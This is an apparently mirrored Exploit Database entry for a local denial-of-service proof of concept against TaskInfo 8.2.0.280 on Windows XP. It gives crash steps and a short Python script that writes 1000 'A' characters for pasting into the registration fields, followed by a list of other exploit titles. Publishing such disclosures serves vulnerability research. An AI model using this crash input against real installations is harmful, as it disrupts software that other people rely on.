TaskInfo 8.2.0.280 – Denial of Service (PoC)

Exploit Database
17 阅读

作者： Rafael Pedrero

日期： 2019-02-04
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/46314/

# Exploit Title: TaskInfo v8.2.0.280 - Denial of Service (PoC)
# Discovery by: Rafael Pedrero
# Discovery Date: 2019-01-30
# Vendor Homepage: http://www.iarsn.com/
# Software Link : http://www.iarsn.com/
# Tested Version: v8.2.0.280
# Tested on: Windows XP SP3
# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow

# Steps to Produce the Crash:
# 1.- Run TaskInfo.exe
# 2.- copy content TaskInfo_Crash.txt to clipboard (result from this python script)
# 3.- Go to "Help" - "Registration" - "Set or View Registration Information" and paste the result in the "New User Name:" and "New Serial Number:" textbox.
# 4.- Click in OK button and you will see a crash.


#!/usr/bin/env python


crash = "\x41" * 1000
f = open ("TaskInfo_Crash.txt", "w")
f.write(crash)
f.close()

last Exploits
TaskInfo 8.2.0.280 – Denial of Service (PoC)的更多信息

Accmeware MP3 Speed 5.0.9 – Denial of Service (PoC)：
Java Web Start Launcher ActiveX Control – Memory Corruption：
Rough Auditing Tool for Security (RATS) 2.3 – Crash (PoC)：
JetAudio 8.1.3 – ‘.mp4’ Crash (PoC)：
Apple Safari 4.0.4 / Google Chrome 4.0.249 – CSS style Stack Overflow Denial of Service (PoC)：
XMPlay 3.8.3 – ‘.m3u’ Denial of Service (PoC)：
J. River Media Jukebox 12 – ‘.mp3’ Remote Heap Buffer Overflow：
ZOC Terminal v7.25.5 – ‘Private key file’ Denial of Service (PoC)：